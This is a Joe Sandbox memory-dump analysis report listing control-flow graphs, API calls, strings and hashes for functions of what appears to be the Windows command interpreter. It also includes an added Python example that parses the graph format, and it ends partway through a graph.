22683 7ff6e9434564 22679->22683 22680->22684 22686 7ff6e943475b _local_unwind 22681->22686 22685 7ff6e94333f0 _vsnwprintf 22682->22685 22687 7ff6e943498c 8 API calls 22683->22687 22684->22662 22684->22666 22689 7ff6e9434612 22684->22689 22685->22689 22686->22661 22688 7ff6e9434577 22687->22688 22688->22667 22690 7ff6e943457f 22688->22690 22689->22667 22689->22669 22691 7ff6e944a920 210 API calls 22690->22691 22692 7ff6e9434584 22691->22692 22692->22667 22695 7ff6e9433a90 170 API calls 22694->22695 22696 7ff6e9449064 22695->22696 22697 7ff6e944906e 22696->22697 22699 7ff6e9449083 22696->22699 22698 7ff6e943498c 8 API calls 22697->22698 22700 7ff6e9449081 22698->22700 22701 7ff6e942cd90 166 API calls 22699->22701 22700->22648 22702 7ff6e944909b 22701->22702 22702->22700 22703 7ff6e943498c 8 API calls 22702->22703 22704 7ff6e94490ec 22703->22704 22705 7ff6e942ff70 2 API calls 22704->22705 22705->22700 22707 7ff6e943ed0a DeleteProcThreadAttributeList 22706->22707 22707->22638 22709 7ff6e942c4c9 22708->22709 22710 7ff6e942c486 22708->22710 22714 7ff6e942ff70 2 API calls 22709->22714 22715 7ff6e942c161 22709->22715 22711 7ff6e942c48e wcschr 22710->22711 22710->22715 22712 7ff6e942c4ef 22711->22712 22711->22715 22713 7ff6e942cd90 166 API calls 22712->22713 22721 7ff6e942c4f9 22713->22721 22714->22715 22715->22515 22715->22537 22716 7ff6e942c5bd 22717 7ff6e942c541 22716->22717 22719 7ff6e942b6b0 170 API calls 22716->22719 22717->22715 22718 7ff6e942ff70 2 API calls 22717->22718 22718->22715 22719->22717 22720 7ff6e942d840 178 API calls 22720->22721 22721->22715 22721->22716 22721->22717 22721->22720 22721->22721 22723 7ff6e942b018 22722->22723 22723->22574 22724->22574 22726 7ff6e9444621 22725->22726 22727 7ff6e94272de 22725->22727 22731 7ff6e944447b longjmp 22726->22731 22732 7ff6e9444639 22726->22732 22749 7ff6e94447e0 22726->22749 22752 7ff6e944475e 22726->22752 22728 7ff6e94272eb 22727->22728 22736 7ff6e9444467 22727->22736 22737 7ff6e9444530 22727->22737 22786 
7ff6e9427348 22728->22786 22730 7ff6e9427348 168 API calls 22735 7ff6e9444524 22730->22735 22733 7ff6e9444492 22731->22733 22738 7ff6e944463e 22732->22738 22739 7ff6e9444695 22732->22739 22740 7ff6e9427348 168 API calls 22733->22740 22745 7ff6e94272b0 168 API calls 22735->22745 22754 7ff6e9427323 22735->22754 22736->22728 22736->22733 22748 7ff6e9444475 22736->22748 22741 7ff6e9427348 168 API calls 22737->22741 22738->22731 22750 7ff6e9444654 22738->22750 22747 7ff6e94273d4 168 API calls 22739->22747 22760 7ff6e94444a8 22740->22760 22761 7ff6e9444549 22741->22761 22742 7ff6e9427315 22801 7ff6e94273d4 22742->22801 22743 7ff6e9427348 168 API calls 22743->22749 22744 7ff6e9427348 168 API calls 22744->22742 22753 7ff6e944480e 22745->22753 22764 7ff6e944469a 22747->22764 22748->22731 22748->22739 22749->22730 22762 7ff6e9427348 168 API calls 22750->22762 22751 7ff6e94445b2 22755 7ff6e9427348 168 API calls 22751->22755 22752->22743 22753->22612 22754->22612 22758 7ff6e94445c7 22755->22758 22756 7ff6e944455e 22756->22751 22765 7ff6e9427348 168 API calls 22756->22765 22757 7ff6e94446e1 22763 7ff6e94272b0 168 API calls 22757->22763 22766 7ff6e9427348 168 API calls 22758->22766 22759 7ff6e94444e2 22768 7ff6e94272b0 168 API calls 22759->22768 22760->22759 22767 7ff6e9427348 168 API calls 22760->22767 22761->22751 22761->22756 22775 7ff6e9427348 168 API calls 22761->22775 22762->22754 22769 7ff6e9444738 22763->22769 22764->22757 22776 7ff6e94446c7 22764->22776 22777 7ff6e94446ea 22764->22777 22765->22751 22771 7ff6e94445db 22766->22771 22767->22759 22772 7ff6e94444f1 22768->22772 22770 7ff6e9427348 168 API calls 22769->22770 22770->22735 22773 7ff6e9427348 168 API calls 22771->22773 22774 7ff6e94272b0 168 API calls 22772->22774 22778 7ff6e94445ec 22773->22778 22779 7ff6e9444503 22774->22779 22775->22756 22776->22757 22783 7ff6e9427348 168 API calls 22776->22783 22780 7ff6e9427348 168 API calls 22777->22780 22781 7ff6e9427348 168 API calls 22778->22781 22779->22754 22782 
7ff6e9427348 168 API calls 22779->22782 22780->22757 22784 7ff6e9444600 22781->22784 22782->22735 22783->22757 22785 7ff6e9427348 168 API calls 22784->22785 22785->22735 22789 7ff6e942735d 22786->22789 22787 7ff6e9423278 166 API calls 22788 7ff6e9444820 longjmp 22787->22788 22790 7ff6e9444838 22788->22790 22789->22787 22789->22789 22789->22790 22800 7ff6e94273ab 22789->22800 22791 7ff6e9423278 166 API calls 22790->22791 22792 7ff6e9444844 longjmp 22791->22792 22793 7ff6e944485a 22792->22793 22794 7ff6e9427348 166 API calls 22793->22794 22795 7ff6e944487b 22794->22795 22796 7ff6e9427348 166 API calls 22795->22796 22797 7ff6e94448ad 22796->22797 22798 7ff6e9427348 166 API calls 22797->22798 22799 7ff6e94272ff 22798->22799 22799->22742 22799->22744 22802 7ff6e9427401 22801->22802 22802->22754 22803 7ff6e9427348 168 API calls 22802->22803 22804 7ff6e944487b 22803->22804 22805 7ff6e9427348 168 API calls 22804->22805 22806 7ff6e94448ad 22805->22806 22807 7ff6e9427348 168 API calls 22806->22807 22808 7ff6e94448be 22807->22808 22808->22754
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
• Instruction ID: d8c265ddad6b4c801b0f1a3f7ced96ce76b96d14dc3697a63a894a568eea3a58
• Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
• Instruction Fuzzy Hash: 174290A3A08682C5EB65DF3198183B967A0AF89B94F444234D91EC77D5DF3EE54CC30A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: 9c40596f1326973e12df33aee824721af9d8f43258b3750f73bc2f4b8dc03744
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: 95229E63A18642D6FB64DF7598183B86691FF49B80F488035CA0EC77D5DE3EA44CC35A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: 2ca22a8d62fbf2c1e0eea160f63df73518fe4804e380967333710ee0b07453a0
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: 46F15A63B18742D5EF218F35E9143B966A4BF04B84F948135CA0D877A4EF3EE949C30A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction ID: c024f5d33f1caef2cb71c9703c64383980c643c3d7048c96cf4362f78e1b4b1c
• Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction Fuzzy Hash: A6F12B73A19A86D6EB60DF21E4443BA77A4FF85B80F404135DA4D82795DF3EE448CB0A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
• API String ID: 145004033-3846321370
• Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction ID: fd95c9b61ba7746aaef4a795ddadbf7c456097f6dbde7ea9bbbc61292e6250bb
• Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction Fuzzy Hash: 83E1503352DA82C6E750DF60E45467EB7A0FF89740F405135EA8E82A58DF7ED548CB0A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
• String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
• API String ID: 2624720099-1920437939
• Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
• Instruction ID: 9b636658a6d472d51f9caab28fcc224e91bf5d85dc7f3a7623475554e0bcc34c
• Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
• Instruction Fuzzy Hash: B5C19F73E08642CAF714EF70A4483B96AA0FF49754F544139DA1EC6B92DE3EA44DC70A

Control-flow Graph

control_flow_graph 1118 7ff6e943823c-7ff6e943829b FindFirstFileExW 1119 7ff6e94382cd-7ff6e94382df 1118->1119 1120 7ff6e943829d-7ff6e94382a9 GetLastError 1118->1120 1124 7ff6e9438365-7ff6e943837b FindNextFileW 1119->1124 1125 7ff6e94382e5-7ff6e94382ee 1119->1125 1121 7ff6e94382af 1120->1121 1122 7ff6e94382b1-7ff6e94382cb 1121->1122 1126 7ff6e943837d-7ff6e9438380 1124->1126 1127 7ff6e94383d0-7ff6e94383e5 FindClose 1124->1127 1128 7ff6e94382f1-7ff6e94382f4 1125->1128 1126->1119 1129 7ff6e9438386 1126->1129 1127->1128 1130 7ff6e9438329-7ff6e943832b 1128->1130 1131 7ff6e94382f6-7ff6e9438300 1128->1131 1129->1120 1130->1121 1132 7ff6e943832d 1130->1132 1133 7ff6e9438332-7ff6e9438353 GetProcessHeap HeapAlloc 1131->1133 1134 7ff6e9438302-7ff6e943830e 1131->1134 1132->1120 1135 7ff6e9438356-7ff6e9438363 1133->1135 1136 7ff6e943838b-7ff6e94383c2 GetProcessHeap HeapReAlloc 1134->1136 1137 7ff6e9438310-7ff6e9438313 1134->1137 1135->1137 1138 7ff6e94450f8-7ff6e944511e GetLastError FindClose 1136->1138 1139 7ff6e94383c8-7ff6e94383ce 1136->1139 1140 7ff6e9438327 1137->1140 1141 7ff6e9438315-7ff6e9438323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
• Instruction ID: 3ad62b98b4c20e97cd88b956b0bcc23845d5a7d6c44566757cd611abacf289e8
• Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
• Instruction Fuzzy Hash: 855108B7A09B42C6E7108F62A4442BDBBA0FF99B91F449135CA1E83351DF3EE458C709
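
The control_flow_graph lines in this report are a flattened edge-list export of one function: a block id, its address range (a single address for one-instruction blocks), the imported APIs or `call <addr>` targets inside the block, and `a->b` edges between block ids. The Python below is an added example, not Joe Sandbox code and not part of the report, that parses that format and answers the questions an analyst usually asks of such a graph: which blocks invoke a given API, what API sequence runs along the shortest path from the entry block to a call, and which blocks are placed far away from the function body. Its input is the 1118 graph copied from this report plus one constructed line; reading `API * n` as "the same callee n times in the block" and the 0x1000-byte distance threshold are assumptions.

```python
import re
from collections import deque

# Copied from this report: the FindFirstFileExW/FindNextFileW function, blocks 1118-1141.
CFG_1118 = (
    "control_flow_graph 1118 7ff6e943823c-7ff6e943829b FindFirstFileExW "
    "1119 7ff6e94382cd-7ff6e94382df 1118->1119 1120 7ff6e943829d-7ff6e94382a9 GetLastError 1118->1120 "
    "1124 7ff6e9438365-7ff6e943837b FindNextFileW 1119->1124 1125 7ff6e94382e5-7ff6e94382ee 1119->1125 "
    "1121 7ff6e94382af 1120->1121 1122 7ff6e94382b1-7ff6e94382cb 1121->1122 "
    "1126 7ff6e943837d-7ff6e9438380 1124->1126 1127 7ff6e94383d0-7ff6e94383e5 FindClose 1124->1127 "
    "1128 7ff6e94382f1-7ff6e94382f4 1125->1128 1126->1119 1129 7ff6e9438386 1126->1129 1127->1128 "
    "1130 7ff6e9438329-7ff6e943832b 1128->1130 1131 7ff6e94382f6-7ff6e9438300 1128->1131 1129->1120 "
    "1130->1121 1132 7ff6e943832d 1130->1132 1133 7ff6e9438332-7ff6e9438353 GetProcessHeap HeapAlloc "
    "1131->1133 1134 7ff6e9438302-7ff6e943830e 1131->1134 1132->1120 1135 7ff6e9438356-7ff6e9438363 "
    "1133->1135 1136 7ff6e943838b-7ff6e94383c2 GetProcessHeap HeapReAlloc 1134->1136 "
    "1137 7ff6e9438310-7ff6e9438313 1134->1137 1135->1137 "
    "1138 7ff6e94450f8-7ff6e944511e GetLastError FindClose 1136->1138 1139 7ff6e94383c8-7ff6e94383ce "
    "1136->1139 1140 7ff6e9438327 1137->1140 1141 7ff6e9438315-7ff6e9438323 1137->1141 1138->1122 "
    "1139->1135 1140->1130 1141->1140"
)

# Constructed line (not from the report) exercising the "call <addr>" and "API * n" notation.
CFG_REPEAT = ("control_flow_graph 1 7ff6e94350b5-7ff6e94350d0 call 7ff6e9433448 * 2 "
              "2 7ff6e94350d2-7ff6e94350d7 GetProcAddress * 3 1->2")

ADDR_RANGE = re.compile(r"^[0-9a-f]{6,}(?:-[0-9a-f]{6,})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(line):
    """Parse one control_flow_graph line into (blocks, edges).

    blocks maps block id -> {"start", "end", "calls"}; edges is a list of (src, dst) ids."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RANGE.match(tokens[i + 1]):
            # a decimal block id followed by a hex address (range) opens a new basic block
            start, _, end = tokens[i + 1].partition("-")
            current = blocks.setdefault(int(tok), {"start": int(start, 16),
                                                   "end": int(end or start, 16),
                                                   "calls": []})
            i += 1
        elif current is None:
            raise ValueError("call token before any block definition: " + tok)
        elif tok == "call":
            current["calls"].append("call " + tokens[i + 1])  # internal callee, keep its address
            i += 1
        elif tok == "*":
            # assumption: "X * n" means callee X occurs n times in this block
            current["calls"].extend([current["calls"][-1]] * (int(tokens[i + 1]) - 1))
            i += 1
        else:
            current["calls"].append(tok)  # an imported API by name
        i += 1
    return blocks, edges


def blocks_calling(blocks, api):
    """Ids of blocks containing a call to `api`, ordered by block address."""
    return sorted((bid for bid, b in blocks.items() if api in b["calls"]),
                  key=lambda bid: blocks[bid]["start"])


def shortest_api_trace(blocks, edges, entry, api):
    """API call sequence along the shortest path from `entry` to a block that calls `api`."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    parent, queue = {entry: None}, deque([entry])
    while queue:
        bid = queue.popleft()
        if api in blocks.get(bid, {}).get("calls", []):
            path = []
            while bid is not None:                       # walk parents back to the entry block
                path.append(bid)
                bid = parent[bid]
            path.reverse()
            return [c for p in path for c in blocks.get(p, {}).get("calls", [])]
        for nxt in succ.get(bid, []):
            if nxt not in parent:
                parent[nxt] = bid
                queue.append(nxt)
    return None


def out_of_line_blocks(blocks, entry, max_distance=0x1000):
    """Blocks whose start lies more than max_distance bytes from the entry block.

    Such blocks are the compiler's out-of-line (cold) code, e.g. the error path at
    7ff6e94450f8 above; carving the function by its entry range alone misses them."""
    base = blocks[entry]["start"]
    return sorted(bid for bid, b in blocks.items() if abs(b["start"] - base) > max_distance)


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_1118)
    print("FindClose in blocks:", blocks_calling(blocks, "FindClose"))
    print("shortest trace to FindClose:", shortest_api_trace(blocks, edges, 1118, "FindClose"))
    print("out-of-line blocks:", out_of_line_blocks(blocks, 1118))
```

Running this on the 1118 graph gives the trace FindFirstFileExW, FindNextFileW, FindClose (a directory enumeration loop) and reports block 1138 as out of line: its HeapReAlloc failure path sits roughly 0xCEBC bytes past the entry block, which is why the dump region listing above and the block ranges must both be consulted before extracting the function's bytes.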

Control-flow Graph

control_flow_graph 1142 7ff6e9432978-7ff6e94329b6 1143 7ff6e94329b9-7ff6e94329c1 1142->1143 1143->1143 1144 7ff6e94329c3-7ff6e94329c5 1143->1144 1145 7ff6e94329cb-7ff6e94329cf 1144->1145 1146 7ff6e943e441 1144->1146 1147 7ff6e94329d2-7ff6e94329da 1145->1147 1148 7ff6e94329dc-7ff6e94329e1 1147->1148 1149 7ff6e9432a1e-7ff6e9432a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff6e94329e3-7ff6e94329eb 1148->1152 1150 7ff6e943e435-7ff6e943e439 1149->1150 1151 7ff6e9432a44-7ff6e9432a5c FindClose 1149->1151 1150->1146 1153 7ff6e9432a62-7ff6e9432a6e 1151->1153 1154 7ff6e9432ae3-7ff6e9432ae5 1151->1154 1152->1147 1155 7ff6e94329ed-7ff6e9432a1c call 7ff6e9438f80 1152->1155 1156 7ff6e9432a70-7ff6e9432a78 1153->1156 1157 7ff6e943e3f7-7ff6e943e3ff 1154->1157 1158 7ff6e9432aeb-7ff6e9432b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff6e9432a7a-7ff6e9432a8d 1156->1161 1158->1153 1162 7ff6e9432b16-7ff6e943e3f1 _wcsicmp 1158->1162 1161->1146 1163 7ff6e9432a93-7ff6e9432a97 1161->1163 1162->1153 1162->1157 1165 7ff6e9432a9d-7ff6e9432ade memmove call 7ff6e94313e0 1163->1165 1166 7ff6e943e404-7ff6e943e407 1163->1166 1165->1152 1167 7ff6e943e40b-7ff6e943e413 1166->1167 1167->1167 1169 7ff6e943e415-7ff6e943e42b memmove 1167->1169 1169->1150
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
• Instruction ID: 7a724d016c5e05420fc9df98c0e36f57778de9691155a25a8de97433ebbc7cb8
• Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
• Instruction Fuzzy Hash: 5351E123B19682C6EA30DF35A5483BAA290BF54BA4F445230DE6E876D1DF3DE449C709

Control-flow Graph

control_flow_graph 643 7ff6e9434d5c-7ff6e9434e4b InitializeCriticalSection call 7ff6e94358e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6e9430580 call 7ff6e9434a14 call 7ff6e9434ad0 call 7ff6e9435554 GetCommandLineW 654 7ff6e9434e4d-7ff6e9434e54 643->654 654->654 655 7ff6e9434e56-7ff6e9434e61 654->655 656 7ff6e9434e67-7ff6e9434e7b call 7ff6e9432e44 655->656 657 7ff6e94351cf-7ff6e94351e3 call 7ff6e9423278 call 7ff6e9434c1c 655->657 662 7ff6e94351ba-7ff6e94351ce call 7ff6e9423278 call 7ff6e9434c1c 656->662 663 7ff6e9434e81-7ff6e9434ec3 GetCommandLineW call 7ff6e94313e0 call 7ff6e942ca40 656->663 662->657 663->662 674 7ff6e9434ec9-7ff6e9434ee8 call 7ff6e943417c call 7ff6e9432394 663->674 678 7ff6e9434eed-7ff6e9434ef5 674->678 678->678 679 7ff6e9434ef7-7ff6e9434f1f call 7ff6e942aa54 678->679 682 7ff6e9434f21-7ff6e9434f30 679->682 683 7ff6e9434f95-7ff6e9434fee GetConsoleOutputCP GetCPInfo call 7ff6e94351ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff6e9434f32-7ff6e9434f39 682->684 689 7ff6e9434ff0-7ff6e9435006 GetConsoleTitleW 683->689 690 7ff6e9435012-7ff6e9435018 683->690 684->683 686 7ff6e9434f3b-7ff6e9434f77 call 7ff6e9423278 GetWindowsDirectoryW 684->686 696 7ff6e9434f7d-7ff6e9434f90 call 7ff6e9433c24 686->696 697 7ff6e94351b1-7ff6e94351b9 call 7ff6e9434c1c 686->697 689->690 694 7ff6e9435008-7ff6e943500f 689->694 691 7ff6e943507a-7ff6e943507e 690->691 692 7ff6e943501a-7ff6e9435024 call 7ff6e9433578 690->692 698 7ff6e94350eb-7ff6e9435161 GetModuleHandleW GetProcAddress * 3 691->698 699 7ff6e9435080-7ff6e94350b3 call 7ff6e944b89c call 7ff6e942586c call 7ff6e9423240 call 7ff6e9433448 691->699 692->691 706 7ff6e9435026-7ff6e9435030 692->706 694->690 696->683 697->662 704 7ff6e943516f 698->704 705 7ff6e9435163-7ff6e9435167 698->705 724 7ff6e94350b5-7ff6e94350d0 call 7ff6e9433448 * 2 699->724 725 7ff6e94350d2-7ff6e94350d7 call 7ff6e9423278 699->725 710 7ff6e9435172-7ff6e94351af free call 7ff6e9438f80 704->710 705->704 709 7ff6e9435169-7ff6e943516d 705->709 712 7ff6e9435075 call 7ff6e944cff0 706->712 713 7ff6e9435032-7ff6e9435059 GetStdHandle GetConsoleScreenBufferInfo 706->713 709->704 709->710 712->691 716 7ff6e9435069-7ff6e9435073 713->716 717 7ff6e943505b-7ff6e9435067 713->717 